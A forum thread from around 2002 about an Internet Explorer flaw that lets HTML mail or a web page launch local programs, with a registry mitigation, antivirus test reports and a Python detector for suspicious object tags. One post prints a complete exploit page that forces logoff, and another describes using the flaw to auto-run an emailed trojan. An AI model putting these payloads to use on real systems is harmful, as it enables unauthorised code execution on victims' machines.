New MSIE Vulnerability - Remote Access

  1. #1
    s0nIc (Fastest Thing Alive)
    Join Date
    Sep 2001
    Location
    Sydney
    Posts
    1,584

    New MSIE Vulnerability - Remote Access

    A Microsoft Internet Explorer vulnerability was found by GreyMagic
    (http://security.greymagic.com/adv/gm001-ie/). With IncrediMail, it's
    possible to gain remote access to a computer.


    IncrediMail automatically saves email attachments in this directory
    (on Windows 2000 Professional):
    C:\Program Files\IncrediMail\Data\Identities\{42D00B20-479C-11d4-9706-00105A40931C}\Message Store\Attachments

    So if you send an HTML email with the GreyMagic vulnerability and a
    trojan as an attachment, it will be saved in this directory.

    The HTML mail contains this code:

    So, the trojan is executed automatically.

  2. #2
    Demonstration:
    simple
    advanced

    Solution: There is no configuration-tweaking workaround for this bug, it will work as long as the browser parses HTML. The only possible solution must come in the form of a patch from Microsoft.
    Update - 3 Mar 2002

    Since the injected <object> runs in the "My Computer" Zone, changing the Internet Zone's settings didn't affect it, but changing the correct zone's settings will prevent this exploit from running.
    Here is the registry information:

    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0]
    Change the value of "1004" (DWORD) to 0x3.
    Tested on: IE5.5sp2 Win98, all patches, Active scripting and ActiveX disabled.
    IE5.5sp2 NT4 sp6a, all patches, Active scripting and ActiveX disabled.
    IE6sp1 Win2000 sp2, all patches, Active scripting and ActiveX disabled.
    IE6sp1 WinXP, all patches, Active scripting and ActiveX disabled.

    Taken from here.


  3. #3
    Senior Member
    Join Date
    Nov 2001
    Posts
    742
    A meaner piece of code than the above example. Once you visit the homepage your computer will log off the current user. Norton AV did find and identify the above but did not succeed in detecting and stopping this piece of code.

    Source and example of the code can be found here --> http://www.****.org/~max/xp_rules.jpg (beware: visiting this webpage can log you out of the computer).

    Code:
    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML>
    <HEAD>
    <TITLE>IE6 security...</TITLE>
    
    <META http-equiv=Content-Type content="text/html; charset=windows-1252">
    <SCRIPT language=JScript>
    
    var programName=new Array(
    	'c:/windows/system32/logoff.exe',
    	'c:/winxp/system32/logoff.exe',
    	'c:/winnt/system32/logoff.exe'
    );
    
    function Init(){
    	var oPopup=window.createPopup();
    	var oPopBody=oPopup.document.body;
    	var n,html='';
    	for(n=0;n<programName.length;n++)
    		html+="<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='"+programName[n]+"' %1='r'></OBJECT>";
    	oPopBody.innerHTML=html;
    	oPopup.show(290, 390, 200, 200, document.body);
    }
    
    </SCRIPT>
    </head>
    <BODY onload="Init()">
    You should feel lucky if you dont have XP right now.
    </BODY>
    </HTML>
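
    Both exploits in this thread share one tell: an <object> whose CODEBASE names a local executable rather than a download URL. As an added example (not code from the thread or from GreyMagic), here is a Python check a mail gateway or an analyst could run over an HTML body to flag such tags, including ones that only exist inside a script string as in the createPopup() variant above; the sample HTML and the download host are constructed.

```python
import re

# Constructed sample HTML body (not from the thread): a benign <object> whose
# CODEBASE is an HTTP download, a GreyMagic-style tag built inside a script
# string as in the popup variant above, and a bare file: URL.
SAMPLE_HTML = """<html><body>
<object classid="clsid:00000000-0000-0000-0000-000000000000"
        codebase="http://download.example.com/player.cab"></object>
<script>
var html = "<OBJECT NAME='X' CLASSID='CLSID:11111111-1111-1111-1111-111111111111' CODEBASE='c:/winnt/system32/calc.exe'></OBJECT>";
</script>
<object codebase=file:///C:/Windows/notepad.exe></object>
</body></html>"""

# A CODEBASE should point at an HTTP(S) download location. Drive letters,
# UNC paths and file: URLs mean the tag is trying to launch a local file.
LOCAL_CODEBASE = re.compile(r"^(?:[a-z]:[\\/]|\\\\|file:)", re.IGNORECASE)
OBJECT_TAG = re.compile(r"<object\b[^>]*>", re.IGNORECASE)
ATTRIBUTE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def object_tags(html):
    """Return the attribute dict of every <object ...> start tag in the text.

    Plain regex scanning is used on purpose: it also catches tags that exist
    only inside JavaScript string literals, which a DOM parser would skip.
    """
    tags = []
    for match in OBJECT_TAG.finditer(html):
        attrs = {}
        body = match.group(0)[len("<object"):]
        for name, dq, sq, bare in ATTRIBUTE.findall(body):
            attrs[name.lower()] = dq or sq or bare
        tags.append(attrs)
    return tags


def find_local_codebase_objects(html):
    """Return the CODEBASE values of <object> tags that reference a local file."""
    return [
        attrs["codebase"]
        for attrs in object_tags(html)
        if LOCAL_CODEBASE.match(attrs.get("codebase", ""))
    ]


if __name__ == "__main__":
    for codebase in find_local_codebase_objects(SAMPLE_HTML):
        print("suspicious <object> codebase:", codebase)
```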

  4. #4
    Senior Member
    Join Date
    Feb 2002
    Posts
    253
    I ran the GreyMagic test on the following:

    IE6.0, Win98, all patches, Scriptblocking enabled
    IE5.5, sp/2, Win98se, Scriptblocking enabled
    IE5.5, sp/1, Win98, Scriptblocking enabled
    The code attempted to run in each case but NAV 7.0 (2001) stopped the exploit each time.
    BTW, Norton Personal Firewall did *nothing*.

  5. #5
    Senior Member
    Join Date
    Sep 2001
    Posts
    118
    Kinda goes to show, you really shouldn't integrate a browser with the Operating System so closely. Modularity is security, in this case--visiting a page with any of the above code will not harm Netscape, for instance, because it is not integrated with the operating system.

    Of course, none of the above exploits had any effect on Opera 5, for RedHat 7.1 ;-)
    Got Root?

    This user powered by Linux.

  6. #6
    Senior Member
    Join Date
    Feb 2002
    Posts
    253
    KublaiKhan wrote:

    "Of course, none of the above exploits had any effect on Opera 5, for RedHat 7.1 ;-)"

    Neither of the above exploits had any effect on OffByOne ver.3.2G, Win98. :-)
